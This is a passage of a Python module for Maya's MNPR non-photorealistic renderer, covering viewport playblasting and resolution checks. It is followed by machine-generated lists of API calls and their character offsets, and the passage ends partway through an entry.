Args:
saveDir (str): save directory with *.mov extension
width (int): width in pixels
height: height in pixels
renderCamera: camera to playblast from
modelPanel: modelPanel to playblast from
renderSize: render size (factor)
"""
check() # check that everything is in order
renderSize = resolutionCheck(width, height, renderSize) # make sure resolution is reasonable
aPlayBackSliderPython = mel.eval('$tmpVar=$gPlayBackSlider')
audioNode = cmds.timeControl(aPlayBackSliderPython, q=True, s=True) # get audio node
# get working values to be changed
workingRenderSize = cmds.getAttr("{0}.renderScale".format(mnpr_info.configNode))
workingColorDepth = cmds.getAttr("{0}.colorDepth".format(mnpr_info.configNode))
workingCamera = cmds.modelEditor(modelPanel, cam=True, q=True)
workingCameraShape = cmds.listRelatives(workingCamera, s=True)
if workingCameraShape:
workingCameraShape = workingCameraShape[0]
else:
# we already have the shape
workingCameraShape = workingCamera
# set desired attributes
cmds.mnpr(g=True)
mnprOperations = len(cmds.mnpr(lsO=True))
cmds.mnpr(renderOperation=mnprOperations-1, s=0) # HUD
cmds.mnpr(renderOperation=mnprOperations-2, s=0) # UI
cmds.modelEditor(modelPanel, cam=renderCamera, e=True) # change modelPanel
lib.setAttr(mnpr_info.configNode, "renderScale", renderSize)
lib.setAttr(mnpr_info.configNode, "colorDepth", 2) # needs to be 32bit to avoid artefacts
cmds.refresh()
# try playblasting
try:
cmds.playblast(f=saveDir, format="qt", w=width, h=height, percent=100, qlt=100, v=True, fo=True, os=True,
s=audioNode, compression="PNG")
except RuntimeError:
try:
cmds.playblast(f=saveDir, format="avi", w=width, h=height, percent=100, qlt=100, v=True, fo=True, os=True,
s=audioNode)
except RuntimeError:
cmds.error("Video cannot be playblasted as qt or avi, please check the installed codecs.")
# bring everything back to normal
cmds.mnpr(renderOperation=mnprOperations-1, s=1) # HUD
cmds.mnpr(renderOperation=mnprOperations-2, s=1) # UI
cmds.modelEditor(modelPanel, cam=workingCameraShape, e=True)
lib.setAttr(mnpr_info.configNode, "renderScale", workingRenderSize)
lib.setAttr(mnpr_info.configNode, "colorDepth", workingColorDepth)
cmds.mnpr(g=False)
cmds.refresh()
lib.printInfo("Video has been successfully playblasted to: {0}".format(saveDir))
def resolutionCheck(width, height, renderSize=1.0):
"""
Checks if resolution is between reasonable hardware limitations
Args:
width (int): viewport width
height (int): viewport height
renderSize (float): render size (factor)
Returns:
renderSize (int): viable render size (factor)
"""
if (width*renderSize > 16384) or (height*renderSize > 16384):
cmds.warning("Resolution too high to supersample, reducing render size")
return resolutionCheck(width, height, renderSize/2.0)
else:
if (width * height * pow(renderSize, 2)) > 150000000:
confirm = cmds.confirmDialog(title='Crash Warning',
message='Rendering a frame at such high resolutions might take long and even crash Maya\nWould you like to continue anyway?',
icn="warning", button=['Yes', 'No'], defaultButton='Yes',
cancelButton='No', dismissString='No', ma='center')
if confirm == 'No':
cmds.error("Frame capture cancelled by user")
return renderSize
def updateAE():
mel.eval("refreshEditorTemplates;")
return True
| [
"maya.cmds.hyperShade",
"maya.cmds.flushUndo",
"mnpr_runner.openOverrideSettings",
"maya.cmds.about",
"coopLib.screenshot",
"coopLib.getActiveModelPanel",
"mnpr_info.loadPlugin",
"mnpr_runner.openPaintFX",
"coopLib.setAttr",
"mnpr_matPresets.setMaterialAttrs",
"maya.cmds.mnpr",
"maya.cmds.eval... | [((669, 691), 'mnpr_info.loadPlugin', 'mnpr_info.loadPlugin', ([], {}), '()\n', (689, 691), False, 'import mnpr_info\n'), ((2115, 2140), 'coopLib.getActiveModelPanel', 'lib.getActiveModelPanel', ([], {}), '()\n', (2138, 2140), True, 'import coopLib as lib\n'), ((2145, 2189), 'maya.cmds.modelEditor', 'cmds.modelEditor', (['viewport'], {'dtx': '(True)', 'e': '(True)'}), '(viewport, dtx=True, e=True)\n', (2161, 2189), True, 'import maya.cmds as cmds\n'), ((2247, 2271), 'mnpr_info.loadRenderer', 'mnpr_info.loadRenderer', ([], {}), '()\n', (2269, 2271), False, 'import mnpr_info\n'), ((2316, 2361), 'maya.cmds.loadPlugin', 'cmds.loadPlugin', (['"""shaderFXPlugin"""'], {'quiet': '(True)'}), "('shaderFXPlugin', quiet=True)\n", (2331, 2361), True, 'import maya.cmds as cmds\n'), ((2369, 2396), 'maya.cmds.about', 'cmds.about', ([], {'nt': '(True)', 'q': '(True)'}), '(nt=True, q=True)\n', (2379, 2396), True, 'import maya.cmds as cmds\n'), ((2501, 2542), 'maya.cmds.loadPlugin', 'cmds.loadPlugin', (['"""glslShader"""'], {'quiet': '(True)'}), "('glslShader', quiet=True)\n", (2516, 2542), True, 'import maya.cmds as cmds\n'), ((2784, 2842), 'maya.cmds.displayColor', 'cmds.displayColor', (['"""headsUpDisplayLabels"""', '(2)'], {'dormant': '(True)'}), "('headsUpDisplayLabels', 2, dormant=True)\n", (2801, 2842), True, 'import maya.cmds as cmds\n'), ((2847, 2905), 'maya.cmds.displayColor', 'cmds.displayColor', (['"""headsUpDisplayValues"""', '(2)'], {'dormant': '(True)'}), "('headsUpDisplayValues', 2, dormant=True)\n", (2864, 2905), True, 'import maya.cmds as cmds\n'), ((3103, 3146), 'coopLib.printInfo', 'lib.printInfo', (['"""-> SYSTEM CHECK SUCCESSFUL"""'], {}), "('-> SYSTEM CHECK SUCCESSFUL')\n", (3116, 3146), True, 'import coopLib as lib\n'), ((3238, 3270), 'maya.cmds.mnpr', 'cmds.mnpr', ([], {'resetStylization': '(True)'}), '(resetStylization=True)\n', (3247, 3270), True, 'import maya.cmds as cmds\n'), ((3308, 3344), 'maya.cmds.objExists', 'cmds.objExists', (['mnpr_info.configNode'], {}), '(mnpr_info.configNode)\n', (3322, 3344), True, 'import maya.cmds as cmds\n'), ((3409, 3425), 'maya.cmds.flushUndo', 'cmds.flushUndo', ([], {}), '()\n', (3423, 3425), True, 'import maya.cmds as cmds\n'), ((3479, 3498), 'maya.cmds.mnpr', 'cmds.mnpr', ([], {'rn': '(False)'}), '(rn=False)\n', (3488, 3498), True, 'import maya.cmds as cmds\n'), ((3523, 3541), 'maya.cmds.mnpr', 'cmds.mnpr', ([], {'rn': '(True)'}), '(rn=True)\n', (3532, 3541), True, 'import maya.cmds as cmds\n'), ((3619, 3645), 'mnpr_runner.reloadConfig', 'mnpr_runner.reloadConfig', ([], {}), '()\n', (3643, 3645), False, 'import mnpr_runner\n'), ((3694, 3723), 'maya.cmds.mnpr', 'cmds.mnpr', ([], {'style': '(True)', 'q': '(True)'}), '(style=True, q=True)\n', (3703, 3723), True, 'import maya.cmds as cmds\n'), ((3778, 3836), 'maya.cmds.window', 'cmds.window', (['mnpr_UIs.BreakdownUI.windowTitle'], {'exists': '(True)'}), '(mnpr_UIs.BreakdownUI.windowTitle, exists=True)\n', (3789, 3836), True, 'import maya.cmds as cmds\n'), ((3919, 3975), 'maya.cmds.window', 'cmds.window', (['mnpr_FX.MNPR_FX_UI.windowTitle'], {'exists': '(True)'}), '(mnpr_FX.MNPR_FX_UI.windowTitle, exists=True)\n', (3930, 3975), True, 'import maya.cmds as cmds\n'), ((4028, 4058), 'coopLib.printInfo', 'lib.printInfo', (['"""Style changed"""'], {}), "('Style changed')\n", (4041, 4058), True, 'import coopLib as lib\n'), ((4719, 4763), 'maya.cmds.pluginInfo', 'cmds.pluginInfo', (['plugin'], {'loaded': '(True)', 'q': '(True)'}), '(plugin, loaded=True, q=True)\n', (4734, 4763), True, 'import maya.cmds as cmds\n'), ((5157, 5173), 'maya.cmds.ls', 'cmds.ls', ([], {'sl': '(True)'}), '(sl=True)\n', (5164, 5173), True, 'import maya.cmds as cmds\n'), ((5916, 5950), 'coopLib.printInfo', 'lib.printInfo', (['"""Shaders refreshed"""'], {}), "('Shaders refreshed')\n", (5929, 5950), True, 'import coopLib as lib\n'), ((6080, 6110), 'maya.cmds.ls', 'cmds.ls', ([], {'type': '"""ShaderfxShader"""'}), "(type='ShaderfxShader')\n", (6087, 6110), True, 'import maya.cmds as cmds\n'), ((6688, 6720), 'coopLib.printInfo', 'lib.printInfo', (['"""Shaders updated"""'], {}), "('Shaders updated')\n", (6701, 6720), True, 'import coopLib as lib\n'), ((6824, 6850), 'maya.cmds.ls', 'cmds.ls', ([], {'type': '"""dx11Shader"""'}), "(type='dx11Shader')\n", (6831, 6850), True, 'import maya.cmds as cmds\n'), ((9450, 9476), 'maya.cmds.ls', 'cmds.ls', ([], {'type': '"""dx11Shader"""'}), "(type='dx11Shader')\n", (9457, 9476), True, 'import maya.cmds as cmds\n'), ((12118, 12146), 'maya.cmds.delete', 'cmds.delete', (['prototypeCNodes'], {}), '(prototypeCNodes)\n', (12129, 12146), True, 'import maya.cmds as cmds\n'), ((12433, 12462), 'os.path.join', 'os.path.join', (['rootDir', 'folder'], {}), '(rootDir, folder)\n', (12445, 12462), False, 'import os\n'), ((12590, 12617), 'maya.cmds.objExists', 'cmds.objExists', (['"""NPRConfig"""'], {}), "('NPRConfig')\n", (12604, 12617), True, 'import maya.cmds as cmds\n'), ((13279, 13313), 'maya.cmds.evaluationManager', 'cmds.evaluationManager', ([], {'mode': '"""off"""'}), "(mode='off')\n", (13301, 13313), True, 'import maya.cmds as cmds\n'), ((14399, 14416), 'maya.cmds.mnpr', 'cmds.mnpr', ([], {'g': '(True)'}), '(g=True)\n', (14408, 14416), True, 'import maya.cmds as cmds\n'), ((14487, 14537), 'maya.cmds.mnpr', 'cmds.mnpr', ([], {'renderOperation': '(mnprOperations - 1)', 's': '(0)'}), '(renderOperation=mnprOperations - 1, s=0)\n', (14496, 14537), True, 'import maya.cmds as cmds\n'), ((14547, 14597), 'maya.cmds.mnpr', 'cmds.mnpr', ([], {'renderOperation': '(mnprOperations - 2)', 's': '(0)'}), '(renderOperation=mnprOperations - 2, s=0)\n', (14556, 14597), True, 'import maya.cmds as cmds\n'), ((14606, 14620), 'maya.cmds.refresh', 'cmds.refresh', ([], {}), '()\n', (14618, 14620), True, 'import maya.cmds as cmds\n'), ((15896, 15932), 'maya.mel.eval', 'mel.eval', (['"""$tmpVar=$gPlayBackSlider"""'], {}), "('$tmpVar=$gPlayBackSlider')\n", (15904, 15932), True, 'import maya.mel as mel\n'), ((15949, 16004), 'maya.cmds.timeControl', 'cmds.timeControl', (['aPlayBackSliderPython'], {'q': '(True)', 's': '(True)'}), '(aPlayBackSliderPython, q=True, s=True)\n', (15965, 16004), True, 'import maya.cmds as cmds\n'), ((16252, 16298), 'maya.cmds.modelEditor', 'cmds.modelEditor', (['modelPanel'], {'cam': '(True)', 'q': '(True)'}), '(modelPanel, cam=True, q=True)\n', (16268, 16298), True, 'import maya.cmds as cmds\n'), ((16324, 16365), 'maya.cmds.listRelatives', 'cmds.listRelatives', (['workingCamera'], {'s': '(True)'}), '(workingCamera, s=True)\n', (16342, 16365), True, 'import maya.cmds as cmds\n'), ((16572, 16589), 'maya.cmds.mnpr', 'cmds.mnpr', ([], {'g': '(True)'}), '(g=True)\n', (16581, 16589), True, 'import maya.cmds as cmds\n'), ((16640, 16690), 'maya.cmds.mnpr', 'cmds.mnpr', ([], {'renderOperation': '(mnprOperations - 1)', 's': '(0)'}), '(renderOperation=mnprOperations - 1, s=0)\n', (16649, 16690), True, 'import maya.cmds as cmds\n'), ((16700, 16750), 'maya.cmds.mnpr', 'cmds.mnpr', ([], {'renderOperation': '(mnprOperations - 2)', 's': '(0)'}), '(renderOperation=mnprOperations - 2, s=0)\n', (16709, 16750), True, 'import maya.cmds as cmds\n'), ((16759, 16813), 'maya.cmds.modelEditor', 'cmds.modelEditor', (['modelPanel'], {'cam': 'renderCamera', 'e': '(True)'}), '(modelPanel, cam=renderCamera, e=True)\n', (16775, 16813), True, 'import maya.cmds as cmds\n'), ((16839, 16899), 'coopLib.setAttr', 'lib.setAttr', (['mnpr_info.configNode', '"""renderScale"""', 'renderSize'], {}), "(mnpr_info.configNode, 'renderScale', renderSize)\n", (16850, 16899), True, 'import coopLib as lib\n'), ((16904, 16954), 'coopLib.setAttr', 'lib.setAttr', (['mnpr_info.configNode', '"""colorDepth"""', '(2)'], {}), "(mnpr_info.configNode, 'colorDepth', 2)\n", (16915, 16954), True, 'import coopLib as lib\n'), ((16999, 17013), 'maya.cmds.refresh', 'cmds.refresh', ([], {}), '()\n', (17011, 17013), True, 'import maya.cmds as cmds\n'), ((17588, 17638), 'maya.cmds.mnpr', 'cmds.mnpr', ([], {'renderOperation': '(mnprOperations - 1)', 's': '(1)'}), '(renderOperation=mnprOperations - 1, s=1)\n', (17597, 17638), True, 'import maya.cmds as cmds\n'), ((17648, 17698), 'maya.cmds.mnpr', 'cmds.mnpr', ([], {'renderOperation': '(mnprOperations - 2)', 's': '(1)'}), '(renderOperation=mnprOperations - 2, s=1)\n', (17657, 17698), True, 'import maya.cmds as cmds\n'), ((17707, 17767), 'maya.cmds.modelEditor', 'cmds.modelEditor', (['modelPanel'], {'cam': 'workingCameraShape', 'e': '(True)'}), '(modelPanel, cam=workingCameraShape, e=True)\n', (17723, 17767), True, 'import maya.cmds as cmds\n'), ((17772, 17839), 'coopLib.setAttr', 'lib.setAttr', (['mnpr_info.configNode', '"""renderScale"""', 'workingRenderSize'], {}), "(mnpr_info.configNode, 'renderScale', workingRenderSize)\n", (17783, 17839), True, 'import coopLib as lib\n'), ((17844, 17910), 'coopLib.setAttr', 'lib.setAttr', (['mnpr_info.configNode', '"""colorDepth"""', 'workingColorDepth'], {}), "(mnpr_info.configNode, 'colorDepth', workingColorDepth)\n", (17855, 17910), True, 'import coopLib as lib\n'), ((17915, 17933), 'maya.cmds.mnpr', 'cmds.mnpr', ([], {'g': '(False)'}), '(g=False)\n', (17924, 17933), True, 'import maya.cmds as cmds\n'), ((17938, 17952), 'maya.cmds.refresh', 'cmds.refresh', ([], {}), '()\n', (17950, 17952), True, 'import maya.cmds as cmds\n'), ((19220, 19255), 'maya.mel.eval', 'mel.eval', (['"""refreshEditorTemplates;"""'], {}), "('refreshEditorTemplates;')\n", (19228, 19255), True, 'import maya.mel as mel\n'), ((2406, 2447), 'maya.cmds.loadPlugin', 'cmds.loadPlugin', (['"""dx11Shader"""'], {'quiet': '(True)'}), "('dx11Shader', quiet=True)\n", (2421, 2447), True, 'import maya.cmds as cmds\n'), ((2955, 2991), 'maya.cmds.objExists', 'cmds.objExists', (['mnpr_info.configNode'], {}), '(mnpr_info.configNode)\n', (2969, 2991), True, 'import maya.cmds as cmds\n'), ((3012, 3036), 'maya.cmds.ls', 'cmds.ls', ([], {'sl': '(True)', 'l': '(True)'}), '(sl=True, l=True)\n', (3019, 3036), True, 'import maya.cmds as cmds\n'), ((3068, 3097), 'maya.cmds.select', 'cmds.select', (['selected'], {'r': '(True)'}), '(selected, r=True)\n', (3079, 3097), True, 'import maya.cmds as cmds\n'), ((3354, 3387), 'maya.cmds.delete', 'cmds.delete', (['mnpr_info.configNode'], {}), '(mnpr_info.configNode)\n', (3365, 3387), True, 'import maya.cmds as cmds\n'), ((3846, 3892), 'mnpr_runner.openOverrideSettings', 'mnpr_runner.openOverrideSettings', ([], {'rebuild': '(True)'}), '(rebuild=True)\n', (3878, 3892), False, 'import mnpr_runner\n'), ((3985, 4022), 'mnpr_runner.openPaintFX', 'mnpr_runner.openPaintFX', ([], {'rebuild': '(True)'}), '(rebuild=True)\n', (4008, 4022), False, 'import mnpr_runner\n'), ((4374, 4431), 'maya.cmds.pluginInfo', 'cmds.pluginInfo', (['mnpr_info.prototype'], {'loaded': '(True)', 'q': '(True)'}), '(mnpr_info.prototype, loaded=True, q=True)\n', (4389, 4431), True, 'import maya.cmds as cmds\n'), ((4811, 4847), 'maya.cmds.objExists', 'cmds.objExists', (['mnpr_info.configNode'], {}), '(mnpr_info.configNode)\n', (4825, 4847), True, 'import maya.cmds as cmds\n'), ((4925, 4941), 'maya.cmds.flushUndo', 'cmds.flushUndo', ([], {}), '()\n', (4939, 4941), True, 'import maya.cmds as cmds\n'), ((4970, 4995), 'maya.cmds.unloadPlugin', 'cmds.unloadPlugin', (['plugin'], {}), '(plugin)\n', (4987, 4995), True, 'import maya.cmds as cmds\n'), ((5021, 5068), 'coopLib.printInfo', 'lib.printInfo', (['"""->PLUGIN SUCCESSFULLY UNLOADED"""'], {}), "('->PLUGIN SUCCESSFULLY UNLOADED')\n", (5034, 5068), True, 'import coopLib as lib\n'), ((5183, 5208), 'maya.cmds.hyperShade', 'cmds.hyperShade', ([], {'smn': '(True)'}), '(smn=True)\n', (5198, 5208), True, 'import maya.cmds as cmds\n'), ((5217, 5241), 'maya.mel.eval', 'mel.eval', (['"""openAEWindow"""'], {}), "('openAEWindow')\n", (5225, 5241), True, 'import maya.mel as mel\n'), ((5260, 5301), 'maya.cmds.warning', 'cmds.warning', (['"""Select object with shader"""'], {}), "('Select object with shader')\n", (5272, 5301), True, 'import maya.cmds as cmds\n'), ((5491, 5531), 'os.path.join', 'os.path.join', (['shaderDir', '"""PrototypeC.fx"""'], {}), "(shaderDir, 'PrototypeC.fx')\n", (5503, 5531), False, 'import os\n'), ((5660, 5686), 'maya.cmds.ls', 'cmds.ls', ([], {'type': '"""dx11Shader"""'}), "(type='dx11Shader')\n", (5667, 5686), True, 'import maya.cmds as cmds\n'), ((5718, 5761), 'os.path.join', 'os.path.join', (['shaderDir', '"""PrototypeC.ogsfx"""'], {}), "(shaderDir, 'PrototypeC.ogsfx')\n", (5730, 5761), False, 'import os\n'), ((5780, 5806), 'maya.cmds.ls', 'cmds.ls', ([], {'type': '"""GLSLShader"""'}), "(type='GLSLShader')\n", (5787, 5806), True, 'import maya.cmds as cmds\n'), ((6240, 6287), 'mnpr_matPresets.getMaterialAttrs', 'mnpr_matPresets.getMaterialAttrs', (['mat', 'matAttrs'], {}), '(mat, matAttrs)\n', (6272, 6287), False, 'import mnpr_matPresets\n'), ((6404, 6452), 'maya.cmds.shaderfx', 'cmds.shaderfx', ([], {'sfxnode': 'mat', 'loadGraph': 'shaderFile'}), '(sfxnode=mat, loadGraph=shaderFile)\n', (6417, 6452), True, 'import maya.cmds as cmds\n'), ((6487, 6534), 'mnpr_matPresets.setMaterialAttrs', 'mnpr_matPresets.setMaterialAttrs', (['mat', 'matAttrs'], {}), '(mat, matAttrs)\n', (6519, 6534), False, 'import mnpr_matPresets\n'), ((7018, 7069), 'maya.cmds.listAttr', 'cmds.listAttr', (['dx11Shader'], {'ud': '(True)', 'st': '"""x*"""', 'k': '(True)'}), "(dx11Shader, ud=True, st='x*', k=True)\n", (7031, 7069), True, 'import maya.cmds as cmds\n'), ((7155, 7213), 'maya.cmds.listConnections', 'cmds.listConnections', (['dx11Shader'], {'t': '"""file"""', 'c': '(True)', 'p': '(True)'}), "(dx11Shader, t='file', c=True, p=True)\n", (7175, 7213), True, 'import maya.cmds as cmds\n'), ((7277, 7308), 'maya.cmds.select', 'cmds.select', (['dx11Shader'], {'r': '(True)'}), '(dx11Shader, r=True)\n', (7288, 7308), True, 'import maya.cmds as cmds\n'), ((7317, 7344), 'maya.cmds.hyperShade', 'cmds.hyperShade', ([], {'objects': '""""""'}), "(objects='')\n", (7332, 7344), True, 'import maya.cmds as cmds\n'), ((7362, 7378), 'maya.cmds.ls', 'cmds.ls', ([], {'sl': '(True)'}), '(sl=True)\n', (7369, 7378), True, 'import maya.cmds as cmds\n'), ((7537, 7564), 'maya.cmds.select', 'cmds.select', (['shapes'], {'r': '(True)'}), '(shapes, r=True)\n', (7548, 7564), True, 'import maya.cmds as cmds\n'), ((7573, 7603), 'maya.cmds.hyperShade', 'cmds.hyperShade', ([], {'assign': 'shader'}), '(assign=shader)\n', (7588, 7603), True, 'import maya.cmds as cmds\n'), ((7708, 7774), 'os.path.join', 'os.path.join', (['mnpr_info.environment', '"""shaders"""', '"""PrototypeC.ogsfx"""'], {}), "(mnpr_info.environment, 'shaders', 'PrototypeC.ogsfx')\n", (7720, 7774), False, 'import os\n'), ((8699, 8757), 'maya.cmds.attributeQuery', 'cmds.attributeQuery', (['"""Color0_Source"""'], {'node': 'shader', 'ex': '(True)'}), "('Color0_Source', node=shader, ex=True)\n", (8718, 8757), True, 'import maya.cmds as cmds\n'), ((8868, 8926), 'maya.cmds.attributeQuery', 'cmds.attributeQuery', (['"""Color1_Source"""'], {'node': 'shader', 'ex': '(True)'}), "('Color1_Source', node=shader, ex=True)\n", (8887, 8926), True, 'import maya.cmds as cmds\n'), ((9037, 9095), 'maya.cmds.attributeQuery', 'cmds.attributeQuery', (['"""Color2_Source"""'], {'node': 'shader', 'ex': '(True)'}), "('Color2_Source', node=shader, ex=True)\n", (9056, 9095), True, 'import maya.cmds as cmds\n'), ((9819, 9870), 'maya.cmds.listAttr', 'cmds.listAttr', (['dx11Shader'], {'ud': '(True)', 'st': '"""x*"""', 'k': '(True)'}), "(dx11Shader, ud=True, st='x*', k=True)\n", (9832, 9870), True, 'import maya.cmds as cmds\n'), ((9956, 10006), 'maya.cmds.listConnections', 'cmds.listConnections', (['dx11Shader'], {'t': '"""file"""', 'c': '(True)'}), "(dx11Shader, t='file', c=True)\n", (9976, 10006), True, 'import maya.cmds as cmds\n'), ((10070, 10101), 'maya.cmds.select', 'cmds.select', (['dx11Shader'], {'r': '(True)'}), '(dx11Shader, r=True)\n', (10081, 10101), True, 'import maya.cmds as cmds\n'), ((10110, 10137), 'maya.cmds.hyperShade', 'cmds.hyperShade', ([], {'objects': '""""""'}), "(objects='')\n", (10125, 10137), True, 'import maya.cmds as cmds\n'), ((10155, 10171), 'maya.cmds.ls', 'cmds.ls', ([], {'sl': '(True)'}), '(sl=True)\n', (10162, 10171), True, 'import maya.cmds as cmds\n'), ((10357, 10384), 'maya.cmds.select', 'cmds.select', (['shapes'], {'r': '(True)'}), '(shapes, r=True)\n', (10368, 10384), True, 'import maya.cmds as cmds\n'), ((10393, 10423), 'maya.cmds.hyperShade', 'cmds.hyperShade', ([], {'assign': 'shader'}), '(assign=shader)\n', (10408, 10423), True, 'import maya.cmds as cmds\n'), ((10525, 10576), 'maya.cmds.shaderfx', 'cmds.shaderfx', ([], {'sfxnode': 'shader', 'loadGraph': 'shaderFile'}), '(sfxnode=shader, loadGraph=shaderFile)\n', (10538, 10576), True, 'import maya.cmds as cmds\n'), ((12627, 12651), 'maya.cmds.delete', 'cmds.delete', (['"""NPRConfig"""'], {}), "('NPRConfig')\n", (12638, 12651), True, 'import maya.cmds as cmds\n'), ((12664, 12700), 'maya.cmds.objExists', 'cmds.objExists', (['mnpr_info.configNode'], {}), '(mnpr_info.configNode)\n', (12678, 12700), True, 'import maya.cmds as cmds\n'), ((12746, 12799), 'maya.cmds.createNode', 'cmds.createNode', (['"""mnprConfig"""'], {'n': 'mnpr_info.configNode'}), "('mnprConfig', n=mnpr_info.configNode)\n", (12761, 12799), True, 'import maya.cmds as cmds\n'), ((12907, 12934), 'maya.mel.eval', 'mel.eval', (['"""AttributeEditor"""'], {}), "('AttributeEditor')\n", (12915, 12934), True, 'import maya.mel as mel\n'), ((12943, 12996), 'coopLib.printInfo', 'lib.printInfo', (['"""-> CONFIG NODE CREATED AND CONNECTED"""'], {}), "('-> CONFIG NODE CREATED AND CONNECTED')\n", (12956, 12996), True, 'import coopLib as lib\n'), ((13015, 13048), 'maya.cmds.select', 'cmds.select', (['mnpr_info.configNode'], {}), '(mnpr_info.configNode)\n', (13026, 13048), True, 'import maya.cmds as cmds\n'), ((13057, 13084), 'maya.mel.eval', 'mel.eval', (['"""AttributeEditor"""'], {}), "('AttributeEditor')\n", (13065, 13084), True, 'import maya.mel as mel\n'), ((14212, 14262), 'coopLib.setAttr', 'lib.setAttr', (['mnpr_info.configNode', '"""colorDepth"""', '(2)'], {}), "(mnpr_info.configNode, 'colorDepth', 2)\n", (14223, 14262), True, 'import coopLib as lib\n'), ((14311, 14371), 'coopLib.setAttr', 'lib.setAttr', (['mnpr_info.configNode', '"""renderScale"""', 'renderSize'], {}), "(mnpr_info.configNode, 'renderScale', renderSize)\n", (14322, 14371), True, 'import coopLib as lib\n'), ((14462, 14481), 'maya.cmds.mnpr', 'cmds.mnpr', ([], {'lsO': '(True)'}), '(lsO=True)\n', (14471, 14481), True, 'import maya.cmds as cmds\n'), ((14675, 14750), 'coopLib.screenshot', 'lib.screenshot', (['saveDir', 'width', 'height'], {'format': 'imgFormat', 'override': 'override'}), '(saveDir, width, height, format=imgFormat, override=override)\n', (14689, 14750), True, 'import coopLib as lib\n'), ((14966, 15016), 'maya.cmds.mnpr', 'cmds.mnpr', ([], {'renderOperation': '(mnprOperations - 1)', 's': '(1)'}), '(renderOperation=mnprOperations - 1, s=1)\n', (14975, 15016), True, 'import maya.cmds as cmds\n'), ((15030, 15080), 'maya.cmds.mnpr', 'cmds.mnpr', ([], {'renderOperation': '(mnprOperations - 2)', 's': '(1)'}), '(renderOperation=mnprOperations - 2, s=1)\n', (15039, 15080), True, 'import maya.cmds as cmds\n'), ((15093, 15160), 'coopLib.setAttr', 'lib.setAttr', (['mnpr_info.configNode', '"""renderScale"""', 'workingRenderSize'], {}), "(mnpr_info.configNode, 'renderScale', workingRenderSize)\n", (15104, 15160), True, 'import coopLib as lib\n'), ((15169, 15235), 'coopLib.setAttr', 'lib.setAttr', (['mnpr_info.configNode', '"""colorDepth"""', 'workingColorDepth'], {}), "(mnpr_info.configNode, 'colorDepth', workingColorDepth)\n", (15180, 15235), True, 'import coopLib as lib\n'), ((15244, 15262), 'maya.cmds.mnpr', 'cmds.mnpr', ([], {'g': '(False)'}), '(g=False)\n', (15253, 15262), True, 'import maya.cmds as cmds\n'), ((15271, 15285), 'maya.cmds.refresh', 'cmds.refresh', ([], {}), '()\n', (15283, 15285), True, 'import maya.cmds as cmds\n'), ((16615, 16634), 'maya.cmds.mnpr', 'cmds.mnpr', ([], {'lsO': '(True)'}), '(lsO=True)\n', (16624, 16634), True, 'import maya.cmds as cmds\n'), ((17055, 17197), 'maya.cmds.playblast', 'cmds.playblast', ([], {'f': 'saveDir', 'format': '"""qt"""', 'w': 'width', 'h': 'height', 'percent': '(100)', 'qlt': '(100)', 'v': '(True)', 'fo': '(True)', 'os': '(True)', 's': 'audioNode', 'compression': '"""PNG"""'}), "(f=saveDir, format='qt', w=width, h=height, percent=100, qlt=\n 100, v=True, fo=True, os=True, s=audioNode, compression='PNG')\n", (17069, 17197), True, 'import maya.cmds as cmds\n'), ((18452, 18524), 'maya.cmds.warning', 'cmds.warning', (['"""Resolution too high to supersample, reducing render size"""'], {}), "('Resolution too high to supersample, reducing render size')\n", (18464, 18524), True, 'import maya.cmds as cmds\n'), ((4861, 4894), 'maya.cmds.delete', 'cmds.delete', (['mnpr_info.configNode'], {}), '(mnpr_info.configNode)\n', (4872, 4894), True, 'import maya.cmds as cmds\n'), ((5547, 5573), 'os.path.isfile', 'os.path.isfile', (['shaderFile'], {}), '(shaderFile)\n', (5561, 5573), False, 'import os\n'), ((5600, 5641), 'os.path.join', 'os.path.join', (['shaderDir', '"""prototypeC.fxo"""'], {}), "(shaderDir, 'prototypeC.fxo')\n", (5612, 5641), False, 'import os\n'), ((10787, 10847), 'maya.cmds.shaderfx', 'cmds.shaderfx', ([], {'sfxnode': 'shader', 'getNodeIDByName': '"""vtxControls"""'}), "(sfxnode=shader, getNodeIDByName='vtxControls')\n", (10800, 10847), True, 'import maya.cmds as cmds\n'), ((10860, 10930), 'maya.cmds.shaderfx', 'cmds.shaderfx', ([], {'sfxnode': 'shader', 'edit_bool': "(nodeId, 'value', vtxControl)"}), "(sfxnode=shader, edit_bool=(nodeId, 'value', vtxControl))\n", (10873, 10930), True, 'import maya.cmds as cmds\n'), ((11058, 11113), 'maya.cmds.shaderfx', 'cmds.shaderfx', ([], {'sfxnode': 'shader', 'getNodeIDByName': '"""Shadow"""'}), "(sfxnode=shader, getNodeIDByName='Shadow')\n", (11071, 11113), True, 'import maya.cmds as cmds\n'), ((11126, 11193), 'maya.cmds.shaderfx', 'cmds.shaderfx', ([], {'sfxnode': 'shader', 'edit_bool': "(nodeId, 'value', shadows)"}), "(sfxnode=shader, edit_bool=(nodeId, 'value', shadows))\n", (11139, 11193), True, 'import maya.cmds as cmds\n'), ((11323, 11383), 'maya.cmds.shaderfx', 'cmds.shaderfx', ([], {'sfxnode': 'shader', 'getNodeIDByName': '"""Specularity"""'}), "(sfxnode=shader, getNodeIDByName='Specularity')\n", (11336, 11383), True, 'import maya.cmds as cmds\n'), ((11396, 11467), 'maya.cmds.shaderfx', 'cmds.shaderfx', ([], {'sfxnode': 'shader', 'edit_bool': "(nodeId, 'value', specularity)"}), "(sfxnode=shader, edit_bool=(nodeId, 'value', specularity))\n", (11409, 11467), True, 'import maya.cmds as cmds\n'), ((12393, 12419), 'os.path.realpath', 'os.path.realpath', (['__file__'], {}), '(__file__)\n', (12409, 12419), False, 'import os\n'), ((14869, 14890), 'traceback.print_exc', 'traceback.print_exc', ([], {}), '()\n', (14888, 14890), False, 'import traceback\n'), ((18681, 18975), 'maya.cmds.confirmDialog', 'cmds.confirmDialog', ([], {'title': '"""Crash Warning"""', 'message': '"""Rendering a frame at such high resolutions might take long and even crash Maya\nWould you like to continue anyway?"""', 'icn': '"""warning"""', 'button': "['Yes', 'No']", 'defaultButton': '"""Yes"""', 'cancelButton': '"""No"""', 'dismissString': '"""No"""', 'ma': '"""center"""'}), '(title=\'Crash Warning\', message=\n """Rendering a frame at such high resolutions might take long and even crash Maya\nWould you like to continue anyway?"""\n , icn=\'warning\', button=[\'Yes\', \'No\'], defaultButton=\'Yes\',\n cancelButton=\'No\', dismissString=\'No\', ma=\'center\')\n', (18699, 18975), True, 'import maya.cmds as cmds\n'), ((11707, 11751), 'coopLib.setAttr', 'lib.setAttr', (['shader', 'dx2sfxAttr[attr]', 'value'], {}), '(shader, dx2sfxAttr[attr], value)\n', (11718, 11751), True, 'import coopLib as lib\n'), ((12031, 12080), 'coopLib.setAttr', 